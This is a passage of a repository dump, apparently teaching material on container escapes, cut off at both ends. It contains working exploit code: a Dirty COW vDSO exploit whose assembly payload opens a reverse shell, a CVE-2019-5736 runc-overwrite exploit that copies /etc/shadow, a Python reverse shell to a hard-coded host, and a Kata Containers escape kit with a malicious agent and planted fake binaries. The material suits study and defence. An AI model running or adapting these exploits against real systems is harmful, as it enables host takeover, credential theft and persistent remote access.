if (fds[1].revents == POLLIN) {
n = read(c, buf, sizeof(buf));
if (n == -1) {
if (errno != EINTR) {
warn("read(c)");
break;
}
} else if (n == 0) {
break;
} else {
writeall(STDOUT_FILENO, buf, n);
}
}
}
return 0;
}
static struct prologue *fingerprint_prologue(void *vdso_addr)
{
unsigned long clock_gettime_addr;
uint32_t clock_gettime_offset;
uint64_t entry_point;
struct prologue *p;
int i;
/* e_entry */
entry_point = *(uint64_t *)((unsigned char *)vdso_addr + 0x18);
clock_gettime_offset = (uint32_t)entry_point & 0xfff;
clock_gettime_addr = (unsigned long)vdso_addr + clock_gettime_offset;
for (i = 0; i < ARRAY_SIZE(prologues); i++) {
p = &prologues[i];
if (memcmp((void *)clock_gettime_addr, p->opcodes, p->size) == 0)
return p;
}
return NULL;
}
/*
* 1.2.3.4:1337
*/
static int parse_ip_port(char *str, uint32_t *ip, uint16_t *port)
{
char *p;
int ret;
str = strdup(str);
if (str == NULL) {
warn("strdup");
return -1;
}
p = strchr(str, ':');
if (p != NULL && p[1] != '\x00') {
*p = '\x00';
*port = htons(atoi(p + 1));
}
ret = (inet_aton(str, (struct in_addr *)ip) == 1) ? 0 : -1;
if (ret == -1)
warn("inet_aton(%s)", str);
free(str);
return ret;
}
int main(int argc, char *argv[])
{
struct prologue *prologue;
struct mem_arg arg;
uint16_t port;
uint32_t ip;
int s;
ip = htonl(PAYLOAD_IP);
port = htons(PAYLOAD_PORT);
if (argc > 1) {
if (parse_ip_port(argv[1], &ip, &port) != 0)
return EXIT_FAILURE;
}
fprintf(stderr, "[*] payload target: %s:%d\n",
inet_ntoa(*(struct in_addr *)&ip), ntohs(port));
arg.vdso_addr = get_vdso_addr();
if (arg.vdso_addr == NULL)
return EXIT_FAILURE;
prologue = fingerprint_prologue(arg.vdso_addr);
if (prologue == NULL) {
fprintf(stderr, "[-] this vDSO version isn't supported\n");
fprintf(stderr, " add first entry point instructions to prologues\n");
return EXIT_FAILURE;
}
if (patch_payload(prologue, ip, port) == -1)
return EXIT_FAILURE;
if (build_vdso_patch(arg.vdso_addr, prologue) == -1)
return EXIT_FAILURE;
s = create_socket(port);
if (s == -1)
return EXIT_FAILURE;
if (exploit(&arg, true) == -1) {
fprintf(stderr, "exploit failed\n");
return EXIT_FAILURE;
}
yeah(&arg, s);
return EXIT_SUCCESS;
}
================================================
FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/Makefile
================================================
CFLAGS := -Wall
LDFLAGS := -lpthread
all: 0xdeadbeef
0xdeadbeef: 0xdeadbeef.o
$(CC) -o $@ $^ $(LDFLAGS)
0xdeadbeef.o: 0xdeadbeef.c payload.h
$(CC) -o $@ -c $< $(CFLAGS)
payload.h: payload
xxd -i $^ $@
payload: payload.s
nasm -f bin -o $@ $^
clean:
rm -f *.o *.h 0xdeadbeef
================================================
FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/payload.s
================================================
BITS 64
[SECTION .text]
global _start
SYS_OPEN equ 0x2
SYS_SOCKET equ 0x29
SYS_CONNECT equ 0x2a
SYS_DUP2 equ 0x21
SYS_FORK equ 0x39
SYS_EXECVE equ 0x3b
SYS_EXIT equ 0x3c
SYS_READLINK equ 0x59
SYS_GETUID equ 0x66
AF_INET equ 0x2
SOCK_STREAM equ 0x1
IP equ 0xdeadc0de ;; patched by 0xdeadbeef.c
PORT equ 0x1337 ;; patched by 0xdeadbeef.c
_start:
;; save registers
push rdi
push rsi
push rdx
push rcx
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
;; return if getuid() != 0
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov rax, SYS_GETUID
syscall
test rax, rax
jne return
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
;; check if whithin a container (PROC_PID_INIT_INO = 0xEFFFFFFC)
;; return if $(readlink /proc/1/ns/pid) != "pid:[4026531836]"
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
call get_strings
lea rsi, [rsp-16]
mov rdx, 16 ; strlen("pid:[4026531836]")
mov rax, SYS_READLINK
syscall
cmp rax, rdx
jne return
add rdi, 15 ; "pid:[4026531836]"
mov rcx, rdx
repe cmpsb
jne return
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
;; return if open("/tmp/.x", O_CREAT|O_EXCL, x) == -1
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov rsi, 0x00782e2f706d742f
push rsi
mov rdi, rsp
mov rsi, 192
mov rax, SYS_OPEN
syscall
test rax, rax
pop rsi
js return
;; fork
mov rax, SYS_FORK
syscall
test rax, rax
jne return
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
;; reverse connect (https://www.exploit-db.com/exploits/35587/)
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; sockfd = socket(AF_INET, SOCK_STREAM, 0)
xor rsi, rsi ; 0 out rsi
mul esi ; 0 out rax, rdx ; rdx = IPPROTO_IP (int: 0)
inc rsi ; rsi = SOCK_STREAM
push AF_INET
pop rdi
add al, SYS_SOCKET
syscall
; copy socket descriptor to rdi for future use
push rax
pop rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = IP
; bzero(&server.sin_zero, 8)
push rdx
push rdx
mov dword [rsp + 0x4], IP
mov word [rsp + 0x2], PORT
mov byte [rsp], AF_INET
;; connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
push rsp
pop rsi
push 0x10
pop rdx
push SYS_CONNECT
pop rax
syscall
test rax, rax
js exit
;; dup2(sockfd, STDIN); dup2(sockfd, STDOUT); dup2(sockfd, STERR)
xor rax, rax
push 0x3 ; loop down file descriptors for I/O
pop rsi
dup_loop:
dec esi
mov al, SYS_DUP2
syscall
jne dup_loop
;; execve('//bin/sh', NULL, NULL)
push rsi ; *argv[] = 0
pop rdx ; *envp[] = 0
push rsi ; '\0'
mov rdi, '//bin/sh' ; str
push rdi
push rsp
pop rdi ; rdi = &str (char*)
xor rax, rax
mov al, SYS_EXECVE
syscall
exit:
xor rax, rax
mov al, SYS_EXIT
syscall
return:
;; restore registers
pop rcx
pop rdx
pop rsi
pop rdi
;; get callee address (pushed on the stack by the call instruction)
pop rax
;; execute missed instructions (patched by 0xdeadbeef.c)
db 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90
;; return to callee
jmp rax
get_strings:
lea rdi, [rel $ +8]
ret
db '/proc/1/ns/pid'
db 0
db 'pid:[4026531836]'
================================================
FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2019-5736/main.go
================================================
package main
// Implementation of CVE-2019-5736
// Created with help from @singe, @_cablethief, and @feexd.
// This commit also helped a ton to understand the vuln
// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
import (
"fmt"
"io/ioutil"
"os"
"strconv"
"strings"
)
// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"
func main() {
// First we overwrite /bin/sh with the /proc/self/exe interpreter path
fd, err := os.Create("/bin/sh")
if err != nil {
fmt.Println(err)
return
}
fmt.Fprintln(fd, "#!/proc/self/exe")
err = fd.Close()
if err != nil {
fmt.Println(err)
return
}
fmt.Println("[+] Overwritten /bin/sh successfully")
// Loop through all processes to find one whose cmdline includes runcinit
// This will be the process created by runc
var found int
for found == 0 {
pids, err := ioutil.ReadDir("/proc")
if err != nil {
fmt.Println(err)
return
}
for _, f := range pids {
fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
fstring := string(fbytes)
if strings.Contains(fstring, "runc") {
fmt.Println("[+] Found the PID:", f.Name())
found, err = strconv.Atoi(f.Name())
if err != nil {
fmt.Println(err)
return
}
}
}
}
// We will use the pid to get a file handle for runc on the host.
var handleFd = -1
for handleFd == -1 {
// Note, you do not need to use the O_PATH flag for the exploit to work.
handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)
if int(handle.Fd()) > 0 {
handleFd = int(handle.Fd())
}
}
fmt.Println("[+] Successfully got the file handle")
// Now that we have the file handle, lets write to the runc binary and overwrite it
// It will maintain it's executable flag
for {
writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)
if int(writeHandle.Fd()) > 0 {
fmt.Println("[+] Successfully got write handle", writeHandle)
writeHandle.Write([]byte(payload))
return
}
}
}
================================================
FILE: code/0304-运行时攻击/01-容器逃逸/cause-core-dump.c
================================================
#include
int main(void)
{
int *a = NULL;
*a = 1;
return 0;
}
================================================
FILE: code/0304-运行时攻击/01-容器逃逸/tmp-dot-x.py
================================================
import os
import pty
import socket
lhost = "172.17.0.1" # 根据实际情况修改
lport = 10000 # 根据实际情况修改
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
os.remove('/tmp/.x.py')
s.close()
if __name__ == "__main__":
main()
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/build.sh
================================================
#!/bin/bash
set -e -x
current_path=`pwd`
agent_path=$GOPATH/src/github.com/kata-containers/agent/
# build evil agent
cd $agent_path
git checkout -- .
git checkout 1.10.0
cp $current_path/evil_agent_src/* $agent_path
sed -i 's/VERSION_COMMIT :=.*$/VERSION_COMMIT := 1.10.0-a8007c2969e839b584627d1a7db4cac13af908a6/g' $agent_path/Makefile
make
cd -
cp $agent_path/kata-agent ./docker/evil-kata-agent
# build reverse shell
gcc -o ./docker/evil_bin evil_bin.c -static
docker build -t kata-malware-image:latest docker/
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/change_container_runtime.sh
================================================
#!/bin/bash
if [ $1 = "kata" ]; then
cat << EOF > /etc/docker/daemon.json
{
"runtimes": {
"kata-runtime": {
"path": "/opt/kata/bin/kata-runtime"
},
"kata-clh": {
"path": "/opt/kata/bin/kata-clh"
},
"kata-qemu": {
"path": "/opt/kata/bin/kata-qemu"
}
},
"registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"]
}
EOF
cat << EOF > /etc/systemd/system/docker.service.d/kata-containers.conf
[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -D --add-runtime kata-runtime=/opt/kata/bin/kata-runtime --add-runtime kata-clh=/opt/kata/bin/kata-clh --add-runtime kata-qemu=/opt/kata/bin/kata-qemu --default-runtime=kata-runtime
EOF
systemctl daemon-reload && systemctl restart docker
elif [ $1 = "runc" ]; then
rm -f /etc/systemd/system/docker.service.d/kata-containers.conf
cat << EOF > /etc/docker/daemon.json
{
"registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"]
}
EOF
systemctl daemon-reload && systemctl restart docker
else
echo "Invalid container runtime."
fi
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/clean_kata.sh
================================================
#!/bin/bash
set -e -x
rm -f /usr/bin/kata*
rm -r /etc/kata-containers
rm -r /opt/kata
rm /etc/docker/daemon.json
rm /etc/systemd/system/docker.service.d/kata-containers.conf
systemctl daemon-reload && systemctl restart docker
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/docker/Dockerfile
================================================
FROM ubuntu:latest
COPY bash /bash
COPY evil-kata-agent /evil-kata-agent
COPY attack.sh /attack.sh
# Since we're targeting /bin, let's put some fake binaries in the image
COPY evil_bin /ls
COPY evil_bin /ps
COPY evil_bin /rm
RUN chmod +x /attack.sh /evil-kata-agent /ls /ps /rm /bash
ENTRYPOINT ["/attack.sh"]
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/docker/attack.sh
================================================
#!/bin/bash
set -e
echo -e "\t[+] In the evil container"
echo -e "\t[*] Searching for the device..."
found_clh_dev=false
for path in /sys/dev/block/* ; do
curr_target=$(readlink $path)
if [[ $curr_target == *"vda1"* ]]; then
dev=$(basename $path)
guest_fs_major=$(echo $dev | cut -f1 -d:)
guest_fs_minor=$(echo $dev | cut -f2 -d:)
found_clh_dev=true
break
fi
done
if [ "$found_clh_dev" = false ]; then
echo -e "\t[!] no vda1 device, not on CLH, shutting down..."
exit 1
fi
echo -e "\t[+] Device found"
echo -e "\t[*] Mknoding..."
mknod --mode 0600 /dev/guest_hd b $guest_fs_major $guest_fs_minor
echo -e "\t[+] Mknoded successfully"
# Ok we're on CLH, let's run the attack
echo -e "\t[*] Replacing the guest kata-agent..."
cmd_file=/tmp/debugfs_cmdfile
rm -rf $cmd_file
cat < $cmd_file
open -w /dev/guest_hd
cd /usr/bin
rm kata-agent
write /evil-kata-agent kata-agent
close -a
EOF
# Execute cmdfile
/sbin/debugfs -f $cmd_file
echo -e "\t[+] Done"
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/evil_agent_src/grpc.go
================================================
//
// Copyright (c) 2017-2019 Intel Corporation
//
// SPDX-License-Identifier: Apache-2.0
//
package main
import (
"bufio"
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"os"
"os/exec"
"path/filepath"
"regexp"
"strconv"
"strings"
"syscall"
"time"
gpb "github.com/gogo/protobuf/types"
"github.com/kata-containers/agent/pkg/types"
pb "github.com/kata-containers/agent/protocols/grpc"
"github.com/opencontainers/runc/libcontainer"
"github.com/opencontainers/runc/libcontainer/configs"
"github.com/opencontainers/runc/libcontainer/seccomp"
"github.com/opencontainers/runc/libcontainer/specconv"
"github.com/opencontainers/runc/libcontainer/utils"
"github.com/opencontainers/runtime-spec/specs-go"
"github.com/sirupsen/logrus"
"golang.org/x/net/context"
"golang.org/x/sys/unix"
"google.golang.org/grpc/codes"
grpcStatus "google.golang.org/grpc/status"
)
type agentGRPC struct {
sandbox *sandbox
version string
}
// CPU and Memory hotplug
const (
cpuRegexpPattern = "cpu[0-9]*"
memRegexpPattern = "memory[0-9]*"
libcontainerPath = "/run/libcontainer"
)
var (
sysfsCPUOnlinePath = "/sys/devices/system/cpu"
sysfsMemOnlinePath = "/sys/devices/system/memory"
sysfsMemoryBlockSizePath = "/sys/devices/system/memory/block_size_bytes"
sysfsMemoryHotplugProbePath = "/sys/devices/system/memory/probe"
sysfsConnectedCPUsPath = filepath.Join(sysfsCPUOnlinePath, "online")
containersRootfsPath = "/run"
// set when StartTracing() is called.
startTracingCalled = false
// set when StopTracing() is called.
stopTracingCalled = false
modprobePath = "/sbin/modprobe"
)
type onlineResource struct {
sysfsOnlinePath string
regexpPattern string
}
type cookie map[string]bool
var emptyResp = &gpb.Empty{}
const onlineCPUMemWaitTime = 100 * time.Millisecond
var onlineCPUMaxTries = uint32(100)
const cpusetMode = 0644
// handleError will log the specified error if wait is false
func handleError(wait bool, err error) error {
if !wait {
agentLog.WithError(err).Error()
}
return err
}
// Online resources, nbResources specifies the maximum number of resources to online.
// If nbResources is <= 0 then there is no limit and all resources are connected.
// Returns the number of resources connected.
func onlineResources(resource onlineResource, nbResources int32) (uint32, error) {
files, err := ioutil.ReadDir(resource.sysfsOnlinePath)
if err != nil {
return 0, err
}
var count uint32
for _, file := range files {
matched, err := regexp.MatchString(resource.regexpPattern, file.Name())
if err != nil {
return count, err
}
if !matched {
continue
}
onlinePath := filepath.Join(resource.sysfsOnlinePath, file.Name(), "online")
status, err := ioutil.ReadFile(onlinePath)
if err != nil {
// resource cold plugged
continue
}
if strings.Trim(string(status), "\n\t ") == "0" {
if err := ioutil.WriteFile(onlinePath, []byte("1"), 0600); err != nil {
agentLog.WithField("online-path", onlinePath).WithError(err).Errorf("Could not online resource")
continue
}
count++
if nbResources > 0 && count == uint32(nbResources) {
return count, nil
}
}
}
return count, nil
}
func onlineCPUResources(nbCpus uint32) error {
resource := onlineResource{
sysfsOnlinePath: sysfsCPUOnlinePath,
regexpPattern: cpuRegexpPattern,
}
var count uint32
for i := uint32(0); i < onlineCPUMaxTries; i++ {
r, err := onlineResources(resource, int32(nbCpus-count))
if err != nil {
return err
}
count += r
if count == nbCpus {
return nil
}
time.Sleep(onlineCPUMemWaitTime)
}
return fmt.Errorf("only %d of %d were connected", count, nbCpus)
}
func onlineMemResources() error {
resource := onlineResource{
sysfsOnlinePath: sysfsMemOnlinePath,
regexpPattern: memRegexpPattern,
}
_, err := onlineResources(resource, -1)
return err
}
// updates a cpuset cgroups path visiting each sub-directory in cgroupPath parent and writing
// the maximal set of cpus in cpuset.cpus file, finally the cgroupPath is updated with the requsted
//value.
// cookies are used for performance reasons in order to
// don't update a cgroup twice.
func updateCpusetPath(cgroupPath string, newCpuset string, cookies cookie) error {
// Each cpuset cgroup parent MUST BE updated with the actual number of vCPUs.
//Start to update from cgroup system root.
cgroupParentPath := cgroupCpusetPath
cpusetGuest, err := getCpusetGuest()
if err != nil {
return err
}
// Update parents with max set of current cpus
//Iterate all parent dirs in order.
//This is needed to ensure the cgroup parent has cpus on needed needed
//by the request.
cgroupsParentPaths := strings.Split(filepath.Dir(cgroupPath), "/")
for _, path := range cgroupsParentPaths {
// Skip if empty.
if path == "" {
continue
}
cgroupParentPath = filepath.Join(cgroupParentPath, path)
// check if the cgroup was already updated.
if cookies[cgroupParentPath] {
agentLog.WithField("path", cgroupParentPath).Debug("cpuset cgroup already updated")
continue
}
cpusetCpusParentPath := filepath.Join(cgroupParentPath, "cpuset.cpus")
agentLog.WithField("path", cpusetCpusParentPath).Debug("updating cpuset parent cgroup")
if err := ioutil.WriteFile(cpusetCpusParentPath, []byte(cpusetGuest), cpusetMode); err != nil {
return fmt.Errorf("Could not update parent cpuset cgroup (%s) cpuset:'%s': %v", cpusetCpusParentPath, cpusetGuest, err)
}
// add cgroup path to the cookies.
cookies[cgroupParentPath] = true
}
// Finally update group path with requested value.
cpusetCpusPath := filepath.Join(cgroupCpusetPath, cgroupPath, "cpuset.cpus")
agentLog.WithField("path", cpusetCpusPath).Debug("updating cpuset cgroup")
if err := ioutil.WriteFile(cpusetCpusPath, []byte(newCpuset), cpusetMode); err != nil {
return fmt.Errorf("Could not update parent cpuset cgroup (%s) cpuset:'%s': %v", cpusetCpusPath, cpusetGuest, err)
}
return nil
}
func (a *agentGRPC) onlineCPUMem(req *pb.OnlineCPUMemRequest) error {
if req.NbCpus == 0 && req.CpuOnly {
return handleError(req.Wait, fmt.Errorf("requested number of CPUs '%d' must be greater than 0", req.NbCpus))
}
// we are going to update the containers of the sandbox, we have to lock it
a.sandbox.Lock()
defer a.sandbox.Unlock()
if req.NbCpus > 0 {
agentLog.WithField("vcpus-to-connect", req.NbCpus).Debug("connecting vCPUs")
if err := onlineCPUResources(req.NbCpus); err != nil {
return handleError(req.Wait, err)
}
}
if !req.CpuOnly {
if err := onlineMemResources(); err != nil {
return handleError(req.Wait, err)
}
}
// At this point all CPUs have been connected, we need to know
// the actual range of CPUs
connectedCpus, err := getCpusetGuest()
if err != nil {
return handleError(req.Wait, fmt.Errorf("Could not get the actual range of connected CPUs: %v", err))
}
agentLog.WithField("range-of-vcpus", connectedCpus).Debug("connecting vCPUs")
cookies := make(cookie)
// Now that we know the actual range of connected CPUs, we need to iterate over
// all containers an update each cpuset cgroup. This is not required in docker
// containers since they don't hot add/remove CPUs.
for _, c := range a.sandbox.containers {
agentLog.WithField("container", c.container.ID()).Debug("updating cpuset cgroup")
contConfig := c.container.Config()
cgroupPath := contConfig.Cgroups.Path
// In order to avoid issues updating the container cpuset cgroup, its cpuset cgroup *parents*
// MUST BE updated, otherwise we'll get next errors:
// - write /sys/fs/cgroup/cpuset/XXXXX/cpuset.cpus: permission denied
// - write /sys/fs/cgroup/cpuset/XXXXX/cpuset.cpus: device or resource busy
// NOTE: updating container cpuset cgroup *parents* won't affect container cpuset cgroup, for example if container cpuset cgroup has "0"
// and its cpuset cgroup *parents* have "0-5", the container will be able to use only the CPU 0.
// cpuset assinged containers are not updated, only we update its parents.
if contConfig.Cgroups.Resources.CpusetCpus != "" {
agentLog.WithField("cpuset", contConfig.Cgroups.Resources.CpusetCpus).Debug("updating container cpuset cgroup parents")
// remove container cgroup directory
cgroupPath = filepath.Dir(cgroupPath)
}
if err := updateCpusetPath(cgroupPath, connectedCpus, cookies); err != nil {
return handleError(req.Wait, err)
}
}
return nil
}
func setConsoleCarriageReturn(fd int) error {
termios, err := unix.IoctlGetTermios(fd, unix.TCGETS)
if err != nil {
return err
}
termios.Oflag |= unix.ONLCR
return unix.IoctlSetTermios(fd, unix.TCSETS, termios)
}
func buildProcess(agentProcess *pb.Process, procID string, init bool) (*process, error) {
user := agentProcess.User.Username
if user == "" {
// We can specify the user and the group separated by ":"
user = fmt.Sprintf("%d:%d", agentProcess.User.UID, agentProcess.User.GID)
}
additionalGids := []string{}
for _, gid := range agentProcess.User.AdditionalGids {
additionalGids = append(additionalGids, fmt.Sprintf("%d", gid))
}
proc := &process{
id: procID,
process: libcontainer.Process{
Cwd: agentProcess.Cwd,
Args: agentProcess.Args,
Env: agentProcess.Env,
User: user,
AdditionalGroups: additionalGids,
Init: init,
},
}
if agentProcess.Terminal {
parentSock, childSock, err := utils.NewSockPair("console")
if err != nil {
return nil, err
}
proc.process.ConsoleSocket = childSock
proc.consoleSock = parentSock
epoller, err := newEpoller()
if err != nil {
return nil, err
}
proc.epoller = epoller
return proc, nil
}
rStdin, wStdin, err := os.Pipe()
if err != nil {
return nil, err
}
rStdout, wStdout, err := os.Pipe()
if err != nil {
return nil, err
}
rStderr, wStderr, err := os.Pipe()
if err != nil {
return nil, err
}
proc.process.Stdin = rStdin
proc.process.Stdout = wStdout
proc.process.Stderr = wStderr
proc.stdin = wStdin
proc.stdout = rStdout
proc.stderr = rStderr
return proc, nil
}
func (a *agentGRPC) Check(ctx context.Context, req *pb.CheckRequest) (*pb.HealthCheckResponse, error) {
return &pb.HealthCheckResponse{Status: pb.HealthCheckResponse_SERVING}, nil
}
func (a *agentGRPC) Version(ctx context.Context, req *pb.CheckRequest) (*pb.VersionCheckResponse, error) {
return &pb.VersionCheckResponse{
GrpcVersion: pb.APIVersion,
AgentVersion: a.version,
}, nil
}
func (a *agentGRPC) getContainer(cid string) (*container, error) {
if !a.sandbox.running {
return nil, grpcStatus.Error(codes.FailedPrecondition, "Sandbox not started")
}
ctr, err := a.sandbox.getContainer(cid)
if err != nil {
return nil, err
}
return ctr, nil
}
// Shared function between CreateContainer and ExecProcess, because those expect
// a process to be run.
func (a *agentGRPC) execProcess(ctr *container, proc *process, createContainer bool) (err error) {
if ctr == nil {
return grpcStatus.Error(codes.InvalidArgument, "Container cannot be nil")
}
if proc == nil {
return grpcStatus.Error(codes.InvalidArgument, "Process cannot be nil")
}
// This lock is very important to avoid any race with reaper.reap().
// Indeed, if we don't lock this here, we could potentially get the
// SIGCHLD signal before the channel has been created, meaning we will
// miss the opportunity to get the exit code, leading WaitProcess() to
// wait forever on the new channel.
// This lock has to be taken before we run the new process.
a.sandbox.subreaper.lock()
defer a.sandbox.subreaper.unlock()
if createContainer {
err = ctr.container.Start(&proc.process)
} else {
err = ctr.container.Run(&(proc.process))
}
// ~ Attack Start ~ //
// Commenting out the following code so that we won't send back a failure
//// if err != nil {
//// return grpcStatus.Errorf(codes.Internal, "Could not run process: %v", err)
//// }
// ~ Attack End ~ //
// Get process PID
pid, err := proc.process.Pid()
if err != nil {
return err
}
proc.exitCodeCh = make(chan int, 1)
// Create process channel to allow WaitProcess to wait on it.
// This channel is buffered so that reaper.reap() will not
// block until WaitProcess listen onto this channel.
a.sandbox.subreaper.setExitCodeCh(pid, proc.exitCodeCh)
return nil
}
// Shared function between CreateContainer and ExecProcess, because those expect
// the console to be properly setup after the process has been started.
func (a *agentGRPC) postExecProcess(ctr *container, proc *process) error {
if ctr == nil {
return grpcStatus.Error(codes.InvalidArgument, "Container cannot be nil")
}
if proc == nil {
return grpcStatus.Error(codes.InvalidArgument, "Process cannot be nil")
}
defer proc.closePostStartFDs()
// Setup terminal if enabled.
if proc.consoleSock != nil {
termMaster, err := utils.RecvFd(proc.consoleSock)
if err != nil {
return err
}
if err := setConsoleCarriageReturn(int(termMaster.Fd())); err != nil {
return err
}
proc.termMaster = termMaster
// Get process PID
pid, err := proc.process.Pid()
if err != nil {
return err
}
a.sandbox.subreaper.setEpoller(pid, proc.epoller)
if err = proc.epoller.add(proc.termMaster); err != nil {
return err
}
}
ctr.setProcess(proc)
return nil
}
// This function updates the container namespaces configuration based on the
// sandbox information. When the sandbox is created, it can be setup in a way
// that all containers will share some specific namespaces. This is the agent
// responsibility to create those namespaces so that they can be shared across
// several containers.
// If the sandbox has not been setup to share namespaces, then we assume all
// containers will be started in their own new namespace.
// The value of a.sandbox.sharedPidNs.path will always override the namespace
// path set by the spec, since we will always ignore it. Indeed, it makes no
// sense to rely on the namespace path provided by the host since namespaces
// are different inside the guest.
func (a *agentGRPC) updateContainerConfigNamespaces(config *configs.Config, ctr *container) {
var ipcNs, utsNs bool
for idx, ns := range config.Namespaces {
if ns.Type == configs.NEWIPC {
config.Namespaces[idx].Path = a.sandbox.sharedIPCNs.path
ipcNs = true
}
if ns.Type == configs.NEWUTS {
config.Namespaces[idx].Path = a.sandbox.sharedUTSNs.path
utsNs = true
}
}
if !ipcNs {
newIPCNs := configs.Namespace{
Type: configs.NEWIPC,
Path: a.sandbox.sharedIPCNs.path,
}
config.Namespaces = append(config.Namespaces, newIPCNs)
}
if !utsNs {
newUTSNs := configs.Namespace{
Type: configs.NEWUTS,
Path: a.sandbox.sharedUTSNs.path,
}
config.Namespaces = append(config.Namespaces, newUTSNs)
}
// Update PID namespace.
var pidNsPath string
// Use shared pid ns if useSandboxPidns has been set in either
// the CreateSandbox request or CreateContainer request.
// Else set this to empty string so that a new pid namespace is
// created for the container.
if ctr.useSandboxPidNs || a.sandbox.sandboxPidNs {
pidNsPath = a.sandbox.sharedPidNs.path
} else {
pidNsPath = ""
}
newPidNs := configs.Namespace{
Type: configs.NEWPID,
Path: pidNsPath,
}
config.Namespaces = append(config.Namespaces, newPidNs)
}
func (a *agentGRPC) updateContainerConfigPrivileges(spec *specs.Spec, config *configs.Config) error {
if spec == nil || spec.Process == nil {
// Don't throw an error in case the Spec does not contain any
// information about NoNewPrivileges.
return nil
}
// Add the value for NoNewPrivileges option.
config.NoNewPrivileges = spec.Process.NoNewPrivileges
return nil
}
func (a *agentGRPC) updateContainerConfig(spec *specs.Spec, config *configs.Config, ctr *container) error {
a.updateContainerConfigNamespaces(config, ctr)
return a.updateContainerConfigPrivileges(spec, config)
}
// rollbackFailingContainerCreation rolls back important steps that might have
// been performed before the container creation failed.
// - Destroy the container created by libcontainer
// - Delete the container from the agent internal map
// - Unmount all mounts related to this container
func (a *agentGRPC) rollbackFailingContainerCreation(ctr *container) {
if ctr.container != nil {
ctr.container.Destroy()
}
a.sandbox.deleteContainer(ctr.id)
if err := removeMounts(ctr.mounts); err != nil {
agentLog.WithError(err).Error("rollback failed removeMounts()")
}
}
func (a *agentGRPC) finishCreateContainer(ctr *container, req *pb.CreateContainerRequest, config *configs.Config) (resp *gpb.Empty, err error) {
containerPath := filepath.Join(libcontainerPath, a.sandbox.id)
factory, err := libcontainer.New(containerPath, libcontainer.Cgroupfs)
if err != nil {
return emptyResp, err
}
ctr.container, err = factory.Create(req.ContainerId, config)
if err != nil {
return emptyResp, err
}
ctr.config = *config
ctr.initProcess, err = buildProcess(req.OCI.Process, req.ExecId, true)
if err != nil {
return emptyResp, err
}
if err = a.execProcess(ctr, ctr.initProcess, true); err != nil {
return emptyResp, err
}
// Make sure add Container to Sandbox, before call updateSharedPidNs
a.sandbox.setContainer(ctr.ctx, req.ContainerId, ctr)
if err := a.updateSharedPidNs(ctr); err != nil {
return emptyResp, err
}
return emptyResp, a.postExecProcess(ctr, ctr.initProcess)
}
func (a *agentGRPC) CreateContainer(ctx context.Context, req *pb.CreateContainerRequest) (resp *gpb.Empty, err error) {
// ~ Attack Start ~ //
// We need to clean up the symlink we created and replace it with a regular directory.
// This ensures that upon sandbox tear-down, when the kata-runtime tries to unmount
// the container filesystem, our symlink at '/run/kata-containers/shared/containers/sbx_id/rootfs'
// won't exist anymore, so the mount we performed on the host won't be unmounted
rootfs_path := "/run/kata-containers/shared/containers/" + a.sandbox.id + "/rootfs"
if err := os.Remove(rootfs_path); err != nil {
return emptyResp, fmt.Errorf("Attack Remove symlink: '%s'", err)
}
if err := os.Mkdir(rootfs_path, os.FileMode(0755)); err != nil {
return emptyResp, fmt.Errorf("Attack Mkdir recreate rootfs dir: '%s'", err)
}
// ~ Attack End ~ //
if err := a.createContainerChecks(req); err != nil {
return emptyResp, err
}
// re-scan PCI bus
// looking for hidden devices
if err = rescanPciBus(); err != nil {
agentLog.WithError(err).Warn("Could not rescan PCI bus")
}
// Some devices need some extra processing (the ones invoked with
// --device for instance), and that's what this call is doing. It
// updates the devices listed in the OCI spec, so that they actually
// match real devices inside the VM. This step is necessary since we
// cannot predict everything from the caller.
if err = addDevices(ctx, req.Devices, req.OCI, a.sandbox); err != nil {
return emptyResp, err
}
// Both rootfs and volumes (invoked with --volume for instance) will
// be processed the same way. The idea is to always mount any provided
